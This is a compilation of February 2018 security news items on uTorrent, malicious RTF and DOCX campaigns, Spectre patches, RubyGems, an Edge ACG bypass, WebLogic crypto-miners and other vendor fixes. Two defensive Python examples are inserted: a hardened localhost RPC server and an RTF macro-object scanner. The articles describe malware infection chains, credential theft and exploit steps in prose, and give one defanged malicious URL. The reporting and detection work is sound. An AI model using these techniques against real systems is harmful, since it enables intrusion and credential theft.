The expert also noticed that the application disables the ASLR and GS exploit mitigations, and that the guest account does not disable some features – the app’s documentation says many features are disabled for security reasons.

Finally, Ormandy found a design flaw related to the use of the Mersenne Twister pseudorandom number generator (PRNG) for creating authentication tokens and cookies, session identifiers, and pairing keys.
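Two of the defensive properties these findings call for, as an added example that is not uTorrent's code: a loopback RPC listener that (1) accepts only Host header values naming the local listener, since a rebound DNS name still arrives with the attacker's hostname in Host, and (2) issues its session secret from the OS CSPRNG rather than a Mersenne Twister PRNG and compares it in constant time. The port, the header names and the `token` query parameter are assumptions.

```python
"""Host-header allow-list plus CSPRNG token for a localhost RPC server (added example)."""
import hmac
import secrets
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

LISTEN_PORT = 10000  # constructed to mirror the classic client's default port


def issue_secret() -> str:
    """32 bytes from the OS CSPRNG: unpredictable even if earlier outputs leak,
    unlike Mersenne Twister output, whose state can be recovered from outputs."""
    return secrets.token_hex(32)


def allowed_hosts(port: int) -> set:
    """Host header values that genuinely name this loopback listener."""
    return {f"127.0.0.1:{port}", f"localhost:{port}", f"[::1]:{port}"}


def host_is_local(host_header, port: int) -> bool:
    """A rebound name such as attacker.example resolving to 127.0.0.1 still
    carries 'Host: attacker.example', which is not on the allow-list."""
    if host_header is None:
        return False
    return host_header.strip().lower() in allowed_hosts(port)


def token_matches(presented, expected: str) -> bool:
    """Constant-time comparison; a missing or wrong-length value never matches."""
    if not presented:
        return False
    return hmac.compare_digest(presented.encode(), expected.encode())


def authorize(headers: dict, path: str, expected_secret: str,
              port: int = LISTEN_PORT) -> tuple:
    """Return (status_code, reason) for a request to the RPC interface.

    Both checks must pass. The Host check runs first so a rebinding origin
    cannot even reach the token-checking code path.
    """
    host = next((v for k, v in headers.items() if k.lower() == "host"), None)
    if not host_is_local(host, port):
        return 403, "host header does not name the local listener"
    query = parse_qs(urlparse(path).query)
    presented = query.get("token", [None])[0]
    if not token_matches(presented, expected_secret):
        return 401, "missing or invalid token"
    return 200, "ok"


SESSION_SECRET = issue_secret()


class RpcHandler(BaseHTTPRequestHandler):
    """Minimal handler wiring authorize() in front of every request."""

    def do_GET(self):
        code, reason = authorize(dict(self.headers), self.path, SESSION_SECRET)
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(reason.encode())


if __name__ == "__main__":
    print("session token:", SESSION_SECRET)
    HTTPServer(("127.0.0.1", LISTEN_PORT), RpcHandler).serve_forever()
```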

The vulnerabilities were reported to BitTorrent on November 27 and they were made public on Tuesday. Ormandy released technical details and proof-of-concept (PoC) code for the more serious of the vulnerabilities he discovered.

The latest beta version of uTorrent Classic (3.5.3 build 44352) patches the flaws, but Ormandy noted that it still disables the ASLR mitigation. BitTorrent says the fixes will be delivered automatically to users over the next days.

As for uTorrent Web, BitTorrent has attempted to implement a patch, but the Google Project Zero researcher says he has managed to bypass it.

BitTorrent VP of Engineering Dave Rees told SecurityWeek that the company only learned of the uTorrent Web vulnerability this week. Nevertheless, the company believes that all vulnerabilities discovered by Ormandy in the two products have been addressed.

uTorrent is not the only torrent application found to be vulnerable to DNS rebinding attacks. In January, Ormandy revealed that he had managed to execute arbitrary code via such an attack against the Transmission client.


Malicious RTF Persistently Asks Users to Enable Macros
21.2.2018 securityweek
Virus  Vulnerebility

A malicious RTF (Rich Text Format) document has been persistently displaying an alert to ask users to enable macros, Zscaler security researchers have discovered.

As part of this unique infection chain, the malicious document forces the victims to execute an embedded VBA macro designed to download the QuasarRAT and NetWiredRC payloads.

While analyzing the attack, the security researchers discovered that the actor included macro-enabled Excel sheets inside the malicious RTF documents, to trick users into allowing the execution of payloads.

The RTF document features the .doc extension and is opened with Microsoft Word. When that happens, a macro warning popup is displayed, prompting the user to either enable or disable the macro.

However, the malicious RTF document repeatedly displays the warning popup even if the targeted user clicks the “Disable Macros” button. By persistently displaying the alert, the malicious actor increases the chances of the user giving in and allowing the macro to run.

The analyzed malicious RTF contains 10 embedded Excel spreadsheets, meaning that the warning is displayed 10 times. Users can’t stop these popups unless they click through all of them or force-quit Word, Zscaler notes.

The attack relies on the “\objupdate” control word applied to the embedded Excel sheet objects (OLE objects). This control word forces the object to be updated, which triggers the macro code inside the embedded Excel sheet when the RTF document is loaded in Microsoft Word, thus causing the multiple macro warning popups to appear.

The same “\objupdate” control was observed being abused in attacks leveraging the CVE-2017-0199 vulnerability that Microsoft patched in April last year. The new attack, however, does not exploit this vulnerability or another Office security flaw.
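An added triage helper, not from the Zscaler report: a Python script that recognises an RTF hiding behind a .doc extension, flags embedded Office objects that carry the \objupdate control word, and counts how many macro prompts Word would raise for them. The sample RTF, the helper names and the Office class prefixes are constructed for this example.

```python
import json
import re

# Constructed sample: a minimal RTF, as it might be delivered with a .doc
# extension, carrying two embedded Excel sheets marked \objupdate and one
# ordinary Package object that is not auto-updated.
SAMPLE_RTF = rb"""{\rtf1\ansi\deff0
{\object\objemb\objupdate{\*\objclass Excel.Sheet.12}{\*\objdata 0105000002000000}}
{\object\objemb\objupdate{\*\objclass Excel.Sheet.12}{\*\objdata 0105000002000000}}
{\object\objemb{\*\objclass Package}{\*\objdata 0105000002000000}}
\par Invoice attached.\par
}"""

OBJECT_RE = re.compile(rb"\\object\b")          # start of an embedded object group
OBJUPDATE_RE = re.compile(rb"\\objupdate\b")    # forces activation at load time
OBJCLASS_RE = re.compile(rb"\\objclass\s+([A-Za-z0-9._]+)")
# Class-name prefixes of objects that can carry VBA (constructed list).
OFFICE_CLASSES = ("Excel.Sheet", "Word.Document", "PowerPoint.Show")


def is_rtf(data: bytes) -> bool:
    """Word sniffs content, not extension: a '.doc' that starts with '{\\rt' is parsed as RTF."""
    return data.lstrip().startswith(b"{\\rt")


def _object_chunks(data: bytes):
    """Yield the text from each \\object control word up to the next one (or end of file)."""
    starts = [m.start() for m in OBJECT_RE.finditer(data)]
    for i, start in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(data)
        yield data[start:end]


def scan_rtf(data: bytes) -> dict:
    """Report embedded objects and how many of them Word would activate on load."""
    report = {"is_rtf": is_rtf(data), "objects": [],
              "auto_activated_office_objects": 0, "suspicious": False}
    if not report["is_rtf"]:
        return report
    for chunk in _object_chunks(data):
        match = OBJCLASS_RE.search(chunk)
        cls = match.group(1).decode("ascii", "replace") if match else "unknown"
        auto = OBJUPDATE_RE.search(chunk) is not None
        report["objects"].append({"class": cls, "objupdate": auto})
        if auto and cls.startswith(OFFICE_CLASSES):
            report["auto_activated_office_objects"] += 1
    # Each auto-activated, macro-capable object raises its own macro prompt;
    # the write-up's sample embedded ten sheets and produced ten prompts.
    report["suspicious"] = report["auto_activated_office_objects"] > 0
    return report


if __name__ == "__main__":
    print(json.dumps(scan_rtf(SAMPLE_RTF), indent=2))
```

The regexes are a deliberately simple heuristic; RTF control words can be obfuscated with whitespace, hex escapes and nested groups, so a production scanner should run on a tokenised RTF stream.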

The actor behind this campaign used two variations of the malicious macro. The code executes a PowerShell command to download intermediate payloads using Schtasks and cmd.exe. By performing registry modifications, the malware would also permanently enable macros for Word, PowerPoint, and Excel.

The macro downloads a malicious VBS file which terminates all running Word and Excel instances, downloads a final payload over HTTPS and executes it.

Next, it enables macros for Office and disables protected view settings in the suite, creates a scheduled task to run the downloaded payload after 200 minutes, deletes the scheduled task, and downloads an additional payload to the same location.

Zscaler observed the attack dropping two Remote Access Trojans (RATs), namely NetwiredRC and QuasarRAT. NetwiredRC can find files, launch a remote shell, log keystrokes, capture the screen, steal passwords, and more. QuasarRAT is free and open source, and is believed to be an evolution of xRAT. It has features such as remote webcam, remote shell, and keylogging.


Intel Releases Spectre Patches for More CPUs
21.2.2018 securityweek
Vulnerebility

Intel has released firmware updates that fix the Spectre vulnerability for many of its processors, and patches for dozens more are nearly ready for use in production environments.

After the first round of microcode updates released by the company caused problems for many users, including more frequent reboots and unstable systems, Intel started working on a new set of patches that should address these issues.

The company first released new firmware updates for its Skylake processors, but on Tuesday it announced that patches are now also available for Kaby Lake, Coffee Lake and other CPUs. This includes 6th, 7th, and 8th generation, and X-series Intel Core products, as well as Xeon Scalable and Xeon D processors used in data center systems.

As of February 21, the following products have Spectre firmware patches ready for use in production environments: Anniedale/Moorefield, Apollo Lake, Avoton/Rangeley, Broxton, Cherry View, Coffee Lake, Cougar Mountain, Denverton, Gemini Lake, Kaby Lake, Knights Landing, Knights Mill, Skylake, SoFIA, Tangier, Valleyview/Bay Trail, and XGold.

Beta patches, which have been provided to OEMs under NDA for validation, are currently available for Broadwell, Gladden, Haswell, some Ivy Bridge, Sandy Bridge, and Skylake Xeon E3 processors.

As for the remaining CPUs, patches are either in pre-beta or planning phase, but pre-mitigation microcode updates, which should be replaced once production fixes are released, are available for many products.

The patches are generally available through OEM firmware updates. Device manufacturers started releasing BIOS updates to patch the Meltdown and Spectre vulnerabilities shortly after their disclosure, but many decided to halt the updates after Intel warned of instability issues. Some vendors have resumed the distribution of firmware updates.

Meltdown attacks are possible due to a vulnerability tracked as CVE-2017-5754, while Spectre attacks are possible due to flaws tracked as CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be patched with software updates, but Spectre Variant 2 requires microcode updates for a complete fix.

Both Intel and AMD announced recently that they are working on processors that will have built-in protections against Spectre- and Meltdown-like exploits.

In the meantime, Intel faces more than 30 lawsuits, including ones filed by customers and shareholders, over the Meltdown and Spectre vulnerabilities.


A new multi-stage attack deploys a password stealer without using macros
20.2.2018 securityaffairs
Vulnerebility  Attack

Security researchers at Trustwave spotted a new malicious campaign that uses a multi-stage attack to deploy a password stealer.
Researchers at Trustwave have spotted a new malware-based campaign that uses a multi-stage infection to deploy a password stealer malware.

Hackers leverage the infamous Necurs botnet to distribute spam emails delivering Microsoft Office documents with embedded malicious macros.

The DOCX attachments used by the attackers contain an embedded OLE object with external references; the document.xml.rels part provides that external access by referencing remote OLE objects.

“Anyone can easily manipulate data in a Word 2007 file programmatically or manually. As shown below, the DOCX attachment contains an embedded OLE object that has external references. This ‘feature’ allows external access to remote OLE objects to be referenced in the document.xml.rels.” states the analysis published by Trustwave.

“When user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually a RTF file that is downloaded and executed.”

Once the victim opens the file, it attempts to trigger the CVE-2017-11882 memory-corruption flaw that has been used by many threat actors in the wild, including the Cobalt hacking group. Microsoft fixed the vulnerability in November. Discovered by security researchers at Embedi, CVE-2017-11882 affects the MS Office component EQNEDT32.EXE, which is responsible for inserting and editing equations (OLE objects) in documents.

The component fails to properly handle objects in memory, a bug that could be exploited by an attacker to execute malicious code in the context of the logged-in user.

Back to the macro-based multi-stage attack discovered by Trustwave: the RTF file fetched when the victim opens the DOCX executes an MSHTA command line to download and execute a remote HTA file.

The HTA file contains VBScript with obfuscated code that decodes to a PowerShell script, which eventually downloads and executes a remote binary: the password stealer malware.

“The malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist.” continues the analysis.

The password stealer will send data to the command and control server (C&C) via an HTTP POST.

The most interesting aspect of this attack is the use of multiple stages to deliver the final payload, an approach that Trustwave calls unusual.

Malware researchers at Trustwave highlighted that such a long infection chain is more likely to fail than the techniques used in other attacks.

“It’s pretty unusual to find so many stages and vectors being used to download malware. Indeed, this approach can be very risky for the malware author. If any one stage fails, it will have a domino effect on the whole process. Another noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF.” concludes Trustwave.

The analysis published by Trustwave includes the Indicators of Compromise (IoCs).


RubyGems 2.7.6 addresses several flaws and implements some improvements
20.2.2018 securityaffairs
Vulnerebility

The RubyGems 2.7.6 update released last week includes several security improvements and addresses several types of vulnerabilities.
The new RubyGems 2.7.6 release addresses several vulnerabilities in Ruby Gems and implements several security improvements.

The updates prevent path traversal when writing to a symlinked basedir outside of the root and during gem installation.

The updates also address a cross-site scripting (XSS) vulnerability in the homepage attribute when displayed via gem server and an Unsafe Object Deserialization issue in gem owner.

The new RubyGems release raises a security error when there are duplicate files in a package and enforces URL validation on the spec homepage attribute.

To update to the latest RubyGems you can run:

gem update --system


Several Vulnerabilities Patched in RubyGems
20.2.2018 securityweek
Vulnerebility

An update released last week for RubyGems includes several security improvements and patches for various types of vulnerabilities.

RubyGems 2.7.6 patches path traversal vulnerabilities that exist when writing to a symlinked basedir outside of the root and during gem installation. It also fixes a cross-site scripting (XSS) vulnerability in the homepage attribute when displayed via gem server, and a possible unsafe object deserialization flaw.

This was not the only deserialization issue patched recently in RubyGems. Back in October, developers informed users that an unsafe deserialization vulnerability could have been exploited for remote code execution.

The latest version of RubyGems also includes some security improvements, such as triggering a security error when a package contains duplicate files, enforcing URL validation on the spec homepage attribute, and strictly interpreting octal fields in tar headers.

Yasin Soliman, nmalkin and plover have each been credited for two of the vulnerabilities patched in RubyGems 2.7.6.

A total of five security holes were patched in RubyGems last year. The deserialization issue, tracked as CVE-2017-0903, and an ANSI escape sequence vulnerability identified as CVE-2017-0899 were the only ones rated “high severity” based on their CVSS score.

Other vulnerabilities fixed last year included a DNS request hijacking issue, a denial-of-service (DoS) flaw, and a weakness that could have been exploited by malicious gems to overwrite arbitrary files.

Five vulnerabilities were also patched last year in Ruby itself, including command injection and memory corruption issues.


Macro-Based Multi-Stage Attack Delivers Password Stealer
20.2.2018 securityweek
Vulnerebility  Attack

A malicious attack uses a multi-stage infection to deploy malware that is capable of stealing passwords from various applications on a victim’s computer, Trustwave reports.

The attack starts with spam emails distributed from the Necurs botnet to deliver macro-enabled documents, such as Word docs, Excel spreadsheets, or PowerPoint presentations, to the targets.

As part of this infection campaign, DOCX attachments containing an embedded OLE object with external references were used. Thus, external access is provided to remote OLE objects referenced in the document.xml.rels, Trustwave explains.

As soon as the user opens the file, a remote document is accessed from the URL hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. Although it has a .doc extension, the file is actually an RTF document.

Once executed on the victim’s system, the file attempts to exploit CVE-2017-11882, a vulnerability in Office’s Equation Editor that Microsoft patched last November and which has already been abused in a wide range of attacks.

The RTF file executes an MSHTA command line to download and execute a remote HTA file. In turn, the HTA file contains VBScript with obfuscated code which decodes to a PowerShell Script designed to fetch and run a remote binary file.

This binary is the final payload, which turns out to be a password stealer malware family capable of gathering credentials from email clients, FTP clients, and browsers installed on the victim’s machine. To do so, it concatenates available strings in memory and uses the RegOpenKeyExW and PathFileExistsW APIs to check whether the registry keys or paths of various programs exist.

The malware was observed sending the harvested data to its command and control (C&C) server via an HTTP POST request.

The most interesting aspect of this attack is the use of multiple stages to deliver the final payload, an approach that Trustwave calls unusual. The security researchers also point out that this long infection chain is more likely to fail compared to other, more straightforward attacks.

“Indeed, this approach can be very risky for the malware author. If any one stage fails, it will have a domino effect on the whole process. Another noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF,” Trustwave concludes.


Record-Breaking Number of Vulnerabilities Disclosed in 2017: Report
19.2.2018 securityweek
Vulnerebility
Vulnerability QuickView 2017 Vulnerability Trends

A record-breaking number of vulnerabilities were disclosed in 2017, with a total of 20,832 such security flaws, a new report from Risk Based Security shows.

According to the company’s VulnDB QuickView report, last year saw a 31.0% year-on-year increase in the number of vulnerabilities disclosed. The number of flaws recorded by the National Vulnerability Database (NVD) increased as well.

Of all the issues published by Risk Based Security in 2017, 7,900 weren’t documented by MITRE’s Common Vulnerability Enumeration (CVE) and NVD, and 44.5% of these issues had a CVSSv2 score between 7.0 and 10. This, the security firm notes, represents a major risk for organizations worldwide, as they might not even be aware of the fact that those vulnerabilities exist.

In 2017, 39.3% of all published vulnerabilities have CVSSv2 scores above 7.0, 48.5% of them can be exploited remotely, and public exploits exist for 31.5% of the vulnerabilities, the security firm’s report (PDF) reveals. Half (50.6%) of the 2017 vulnerabilities are web-related and 28.9% of these web-related issues are Cross-Site Scripting (XSS) bugs.

The list of top ten vendors with vulnerabilities featuring CVSS scores between 9.0 and 10.0 includes Google (503 flaws), SUSE (301), Canonical (285), Red Hat (274), SGP – a subsidiary of Silent Circle (257), Adobe (256), Mozilla (246), Samsung (228), Oracle (201), and Xerox (198).

The top ten products with vulnerabilities featuring CVSSv2 scores of 9.0 - 10.0 include Google Pixel/Nexus devices (354 issues), Ubuntu (285), SilentOS (257), Red Hat Enterprise Linux (253), Firefox (246), SUSE Linux Enterprise Desktop (226), Samsung Mobile Devices (226), SUSE Linux Enterprise Server (197), OpenSUSE Leap (196), and FreeFlow Print Server (191).

Last year, at least 44.8% (9,335) of vulnerabilities disclosed were coordinated with the vendor and only 18.6% (3,875) of them were uncoordinated disclosures. Only 5.9% of 2017 vulnerabilities were disclosed as part of vendor or third-party bug bounty programs, the report reveals.

While most of the vulnerabilities disclosed last year (72.8%) have updates or some form of a patch available for them, 23.2% of the issues currently have no known solution. However, 443 of the vulnerabilities reported in 2017 were found to have no risk due to inaccurate disclosures, meaning that no mitigation was necessary for them.

The report also reveals that only 1.7% of all reported vulnerabilities in 2017 were found in SCADA products, down from 2.8% in 2016. 52.2% of the SCADA vulnerabilities were remotely exploitable, 73.5% had an impact on the integrity of the product, and 61.3% were related to improper input validation.

“Organizations that track and triage vulnerability patching saw no relief in 2017, as it was yet another record-breaking year for vulnerability disclosures. The increasingly difficult task of protecting digital assets has never been so critical to businesses as we continue to see a rise in compromised organizations and data breaches. If your vulnerability intelligence solution didn’t offer information on the more than 20,000 vulnerabilities disclosed in 2017, your organization is at an increased risk”, said Brian Martin, VP of Vulnerability Intelligence for Risk Based Security.


Over 30 Lawsuits Filed Against Intel for CPU Flaws
19.2.2018 securityweek
Vulnerebility

More than 30 lawsuits have been filed by Intel customers and shareholders against the chip giant following the disclosure of the Meltdown and Spectre attack methods.

Three class action lawsuits were filed against Intel within a week of the Meltdown and Spectre flaws being disclosed, but the number had reached 32 by February 15, according to an annual report submitted by Intel to the U.S. Securities and Exchange Commission (SEC).

Lawsuits have been filed in the United States and other countries, and some complaints also target Intel’s directors and executives.

The company faces 30 class action lawsuits filed by customers who claim to have been harmed by Intel’s actions and/or omissions in connection to Meltdown and Spectre. Two securities class action lawsuits claim the company violated securities laws by making false or misleading statements, which had a negative impact on entities that acquired Intel stock between July 27, 2017 and January 4, 2018, when the processor vulnerabilities were disclosed.

“We dispute the claims described above and intend to defend the lawsuits vigorously,” Intel said. “Given the procedural posture and the nature of these cases, including that the proceedings are in the early stages, that alleged damages have not been specified, that uncertainty exists as to the likelihood of a class or classes being certified or the ultimate size of any class or classes if certified, and that there are significant factual and legal issues to be resolved, we are unable to make a reasonable estimate of the potential loss or range of losses, if any, that might arise from these matters.”

Three shareholder derivative lawsuits have also been filed in California against certain Intel officers and members of the company’s board of directors.

“The complaints allege that the defendants breached their duties to Intel in connection with the disclosure of the security vulnerabilities and the failure to take action in relation to alleged insider trading. The complaints seek to recover damages from the defendants on behalf of Intel,” Intel said.

While lawsuits and negative publicity may change the situation in the future, Intel currently does not expect Meltdown and Spectre to have a material financial impact on its business or operations.

AMD, ARM and Apple, whose processors rely on ARM technology, also face lawsuits over the Meltdown and Spectre vulnerabilities.


90 days have passed, Google discloses unpatched flaw in the Microsoft Edge browser
19.2.2018 securityaffairs
Vulnerebility

Google Project Zero disclosed details of an unpatched flaw in the Edge browser because Microsoft failed to address it within a 90-day deadline.
White hat hackers at Google Project Zero have disclosed details of an unpatched vulnerability in the Edge browser because Microsoft failed to address it within the 90-day deadline set by Google’s disclosure policy.

The flaw could be exploited by attackers to bypass the Arbitrary Code Guard (ACG) that was implemented in Windows 10 Creators Update alongside Code Integrity Guard (CIG).

These security features are designed to prevent Edge browser exploits from loading and executing malicious code.

“An application can directly load malicious native code into memory by either 1) loading a malicious DLL/EXE from disk or 2) dynamically generating/modifying code in memory. CIG prevents the first method by enabling DLL code signing requirements for Microsoft Edge. This ensures that only properly signed DLLs are allowed to load by a process. ACG then complements this by ensuring that signed code pages are immutable and that new unsigned code pages cannot be created.” states the description published by Microsoft.

Google Project Zero researcher Ivan Fratric, who discovered the vulnerability, demonstrated that the ACG feature can be bypassed. The expert reported the issue to Microsoft on November 17. The tech giant had initially planned to include a fix in the February Patch Tuesday updates, but evidently something went wrong, because “the fix is more complex than initially anticipated.”

The vulnerability was classified as having “medium” severity; Project Zero has published details of the issue in a blog post.

“If a content process is compromised and the content process can predict on which address JIT process is going to call VirtualAllocEx() next (note: it is fairly predictable), content process can: 1. Unmap the shared memory mapped above using UnmapViewOfFile() 2. Allocate a writable memory region on the same address JIT server is going to write and write a soon-to-be-executable payload there. 3. When JIT process calls VirtualAllocEx(), even though the memory is already allocated, the call is going to succeed and the memory protection is going to be set to PAGE_EXECUTE_READ.” reads the analysis shared by Google.

In February 2017, Fratric published technical details related to a high severity type confusion vulnerability, tracked as CVE-2017-0037, that could have been exploited by attackers to crash Internet Explorer and Edge browser, and under certain circumstance to execute arbitrary code.


Google Discloses Unpatched Edge Vulnerability
19.2.2018 securityweek
Vulnerebility

Google Project Zero has made public the details of an unpatched vulnerability affecting the Edge web browser after Microsoft failed to release a patch within a 90-day deadline.

Google Project Zero researcher Ivan Fratric has found a way to bypass Arbitrary Code Guard (ACG), a feature added by Microsoft to Edge in Windows 10 Creators Update alongside Code Integrity Guard (CIG).

The features, introduced in February 2017, are designed to prevent browser exploits from executing malicious code.

“An application can directly load malicious native code into memory by either 1) loading a malicious DLL/EXE from disk or 2) dynamically generating/modifying code in memory,” Microsoft explained. “CIG prevents the first method by enabling DLL code signing requirements for Microsoft Edge. This ensures that only properly signed DLLs are allowed to load by a process. ACG then complements this by ensuring that signed code pages are immutable and that new unsigned code pages cannot be created.”

Fratric showed that the ACG feature can be bypassed and informed Microsoft of his findings on or around November 17. The company had initially planned on patching the vulnerability with its February Patch Tuesday updates, but later determined that “the fix is more complex than initially anticipated.”

Microsoft now expects to release a fix on March 13, but the date exceeds Google Project Zero’s 90-day disclosure deadline so the details of the vulnerability have been made public. Project Zero has classified the flaw as having “medium” severity.

This is not the first time Project Zero has disclosed an unpatched vulnerability found by Fratric in Microsoft’s web browsers. In February 2017, it made public details and proof-of-concept (PoC) code for a high severity type confusion issue that could have been exploited to crash Internet Explorer and Edge, and possibly even execute arbitrary code.

The security hole, tracked as CVE-2017-0037, was fixed by Microsoft in March 2017, roughly two weeks after it was disclosed.

Fratric is the creator of a fuzzer named Domato, which last year helped him uncover tens of vulnerabilities in popular web browser engines.


Oracle WebLogic Server Flaw Exploited to Deliver Crypto-Miners
16.2.2018 securityweek
Vulnerebility  Exploit  CoinMine

Threat actors are exploiting a recently patched vulnerability in Oracle WebLogic Server to infect systems with crypto-currency mining malware, FireEye reports.

Identified as CVE-2017-10271, the vulnerability resides in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and older, and was addressed by Oracle in its October 2017 Critical Patch Update (CPU).

After proof-of-concept code exploiting the bug was made public in December, activity associated with the exploitation of this vulnerability increased in volume, FireEye's researchers say. Successful exploitation of the flaw on unpatched systems allows attackers to remotely execute arbitrary code.

“We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity,” FireEye reported.

The crypto-currency market boomed recently, and cybercriminals have not been shy in their attempts to take advantage of the market. However, actors involved in crypto-currency mining operations don’t normally target specific organizations, but rather launch attacks that are opportunistic in nature.

Attackers abusing CVE-2017-10271 to infect targeted systems with crypto-miners used various tactics to achieve their purpose, the researchers discovered. Some of the incidents, for example, used PowerShell to drop the miner directly onto the victim’s system and leveraged ShellExecute() for execution.

In other attacks, PowerShell scripts were used to deliver the miner, instead of downloading the executable directly. In addition to downloading the miner, the script would also attempt to achieve persistence through scheduled tasks.

The script would delete the tasks created by other crypto-miners and kill processes associated with those programs, in addition to being able to connect to mining pools with a wallet key. It would also limit CPU usage to avoid suspicion.

Tactics employed in other attacks also involved the use of tools such as Mimikatz and EternalBlue for lateral movement across Windows environments.

The malware would first determine whether the system is 32-bit or 64-bit, to fetch a specific PowerShell script from the command and control (C&C) server. Next, it checks all network adapters and attempts to connect to every system in the network using extracted credentials, running a PowerShell script to drop and run the malware on the targeted system.

The malware uses WMI (Windows Management Instrumentation) for persistence and can perform a Pass-the-Hash attack using NTLM information derived from Mimikatz, to download and execute the malware on remote machines. It sends the stolen credentials to a remote server using an HTTP GET request.

If it fails moving laterally, the malware uses the PingCastle MS17-010 scanner to determine whether the target is vulnerable to EternalBlue.

In scenarios targeting Linux machines, the vulnerability would be exploited to deliver shell scripts that include functionality similar to that of PowerShell scripts. They would attempt to kill already running crypto-miners and then download and execute the malware, in addition to creating a cron job to maintain persistence.

“Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks,” FireEye says.

Although they might be seen as less risky when compared to ransomware operations, crypto-currency mining malware does pose a variety of risks. Systems infected with crypto-miners might experience slowed performance, but such operations could also be hiding additional malware.


BGP Flaws Patched in Quagga Routing Software
16.2.2018 securityweek
Vulnerebility

Several vulnerabilities that could lead to denial-of-service (DoS), information disclosure, and remote code execution have been patched this week in the Quagga routing software suite.

Quagga implements the Open Shortest Path First (OSPF), Routing Information Protocol (RIP), Border Gateway Protocol (BGP) and Intermediate System to Intermediate System (IS-IS) protocols for Unix-like platforms, particularly Linux, Solaris, FreeBSD and NetBSD.

Quagga developers and the CERT Coordination Center (CERT/CC) at Carnegie Mellon University announced this week that Quagga 1.2.3 patches several vulnerabilities affecting the BGP daemon (bgpd).

One of the more serious flaws, rated critical by CERT/CC based on its CVSS score, is CVE-2018-5379, a double-free memory corruption issue related to the processing of certain UPDATE messages containing cluster-list or unknown attributes.

“This issue can be triggered by an optional/transitive UPDATE attribute, that all conforming eBGP speakers should pass along. This means this may be triggerable in many affected Quagga bgpd processes across a wide area of a network, because of just one UPDATE message,” Quagga developers explained. “This issue could result in a crash of bgpd, or even allow a remote attacker to gain control of an affected bgpd process.”

Another vulnerability, CVE-2018-5381, can be exploited to cause bgpd to enter an infinite loop and stop responding until it’s restarted. “BGP sessions will drop and not be reestablished,” developers said.

Quagga 1.2.3 also patches CVE-2018-5378, a security hole that can lead to sensitive data from the bgpd process being sent over the network to a configured peer. This can also cause the bgpd process to crash.

The last vulnerability patched by the latest Quagga release is CVE-2018-5380, which developers say has “very low” impact.

Linux distributions, including Ubuntu, Debian and Red Hat, have started publishing advisories describing these vulnerabilities. Regarding CVE-2018-5379, Red Hat said “Glibc's heap protection mitigations render this issue more difficult to exploit, though bypasses may still be possible.”


DELL EMC addressed two critical flaws in VMAX enterprise storage systems
16.2.2018 securityaffairs
Vulnerebility

Dell EMC addressed two critical vulnerabilities that affect the management interfaces for its VMAX enterprise storage systems.
Dell EMC’s VMAX Virtual Appliance (vApp) Manager is an essential component of a wide range of its enterprise storage systems.

The first flaw tracked as CVE-2018-1215 is an arbitrary file upload vulnerability that could be exploited by a remote authenticated attacker to potentially upload arbitrary maliciously crafted files in any location on the web server. The flaw received a Common Vulnerability Scoring System (CVSS) base score of 8.8.

“Arbitrary file upload vulnerability: A remote authenticated malicious user may potentially upload arbitrary maliciously crafted files in any location on the web server. By chaining this vulnerability with CVE-2018-1216, the attacker may use the default account to exploit this vulnerability.” reads the security advisory.

The second flaw tracked as CVE-2018-1216 is an undocumented default account in the vApp Manager with a hard-coded password. The flaw received a Common Vulnerability Scoring System (CVSS) base score of 9.8.

“Hard-coded password vulnerability: The vApp Manager contains an undocumented default account (“smc”) with a hard-coded password that may be used with certain web servlets. A remote attacker with the knowledge of the hard-coded password and the message format may use vulnerable servlets to gain unauthorized access to the system. Note: This account cannot be used to log in via the web user interface.” continues the advisory.

CVE-2018-1215 can be chained with CVE-2018-1216: the hard-coded password of the default account supplies the authentication that the file upload flaw requires, so an unauthenticated remote attacker can exploit the two together.

“The vApp Manager which is embedded in Dell EMC Unisphere for VMAX, Dell EMC Solutions Enabler, Dell EMC VASA Virtual Appliances, and Dell EMC VMAX Embedded Management (eManagement) contains multiple security vulnerabilities that may potentially be exploited by malicious users to compromise the affected system.” states the security advisory issued by Dell EMC.

Affected products:

Dell EMC Unisphere for VMAX Virtual Appliance versions prior to 8.4.0.18
Dell EMC Solutions Enabler Virtual Appliance versions prior to 8.4.0.21
Dell EMC VASA Virtual Appliance versions prior to 8.4.0.514
Dell EMC VMAX Embedded Management (eManagement) versions prior to and including 1.4 (Enginuity Release 5977.1125.1125 and earlier)

Dell EMC has removed the default “smc” account from new installs, but the company warned that the account is not removed when an existing vApp Manager installation is upgraded.


SAP Security Notes – February 2018 addresses tens of flaws including High Risk issues
15.2.2018 securityaffairs
Vulnerebility

SAP Security Notes – February 2018: SAP Security Notes February 2018 addressed several vulnerabilities including High-Risk flaws.
SAP has released February 2018 Patches that addressed some high-risk vulnerabilities in its software, a total of 26 Security Notes (5 high-, 19 medium- and 2 low-risk). Once again, the missing authorization check is the most common vulnerability type this month.

The Security Notes SAP released address three cross-site scripting (XSS) vulnerabilities, two directory traversal flaws, two information disclosure bugs, two missing authorization checks, one unrestricted file upload, and other issues.

Affected products are the Internet Graphics Server (IGS), NetWeaver System Landscape Directory, HANA Extended Application Services, ABAP File Interface, SAP CRM, ERP Financials Information System, Netweaver Portal, Netweaver Java Web Application, CRM WebClient UI, BI Launchpad, and SAP HANA.

“On 13th of February 2018, SAP Security Patch Day saw the release of 11 Security Notes. Additionally, there were 3 updates to previously released security notes.” reads the advisory published by SAP.

